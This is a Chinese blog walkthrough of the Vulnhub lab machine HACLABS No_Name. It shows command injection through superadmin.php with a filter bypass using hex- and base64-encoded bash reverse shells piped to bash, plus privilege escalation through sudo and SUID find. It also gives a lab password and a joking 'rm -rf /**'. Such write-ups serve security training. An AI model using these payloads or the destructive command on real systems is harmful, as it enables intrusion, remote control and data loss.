【Vulnhub】靶机HACLAS-NO-NAME

前言

  • Vulnhub刷题简单记录

NO_NAME

描述

这是一台初学者级别的机器,获得外壳有点困难,只要想开箱即用即可获得外壳。一旦获得外壳,权限提升就很容易。

这台机器有3个标志。每个标志都存在于特定用户的主目录中。准备好测试您的 Linux 技能。

初级/中级

NO_NAME开始

1、可以用两种方法确认靶场的存在,扫ip

1
2
netdiscover -i eth0 -r 192.168.56.0/24
nmap -sn 192.168.56.0/24

2、扫目标端口开发情况

1
2
nmap -sV -sC 192.168.56.109 -oA R
./nmapAutomator.sh -H 192.168.56.109 -t recon

3、访问主页,爆破目录,指定扫描php,这里用最大的字典,发现了superadmin.php

1
gobuster dir -u http://192.168.56.109 -w /usr/share/wordlists/dirb/big.txt -t 100 -x php

4、在此目录发现了命令执行漏洞,通过cat查看源代码,发现过滤了一些字符,这里给出两种方法解决

1
|| cat superadmin.php

image-20210926135855048

方法一

①、首先将我们的反弹代码转换为16进制

image-20210926135956216

②、利用xxd将其转换为ascii码字符,然后通过bash执行反弹成功,payload

1
echo "62617368202d6920263e2f6465762f7463702f3139322e3136382e35362e312f3132333420303e2631"|xxd -r -p|bash

方法二

①、将其转换为base64

1
||echo "YmFzaCAtaSAmPi9kZXYvdGNwLzE5Mi4xNjguNTYuMS8xMjM0IDA+JjEK" |base64 -d|bash

拿到shell之后,在home目录中找到yash的flag,提示说有一个隐藏文件

image-20210926142259849

这里我们就用find来寻找yash用户创建的文件,里面藏有密码

1
find / -name "*pass*" -type f -user yash 2>/dev/null

找到了/usr/share/hidden/.passwd目录,发现了另一个用户的密码

1
haclabs:haclabs1234

5、提权,接着发现可以无密码执行find

image-20210926142643706

简单的find提权

1
sudo find -exec /bin/bash \;

image-20210926143359326

提权方式二suid

1
find / -perm -u=s -type f 2>/dev/null

直接用下面命令,记得要加-p才能成功,或者直接反弹shell也行

1
find sky -exec /bin/bash -p \;

你如果闲的蛋疼也可以删除所有东西

1
rm -rf /**

我的个人博客

孤桜懶契:http://gylq.gitee.io

本文标题:【Vulnhub】靶机HACLAS-NO-NAME

文章作者:孤桜懶契

发布时间:2021年09月26日 - 13:30:52

最后更新:2022年05月20日 - 11:47:45

原始链接:https://gylq.gitee.io/posts/155.html

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。

-------------------本文结束 感谢您的阅读-------------------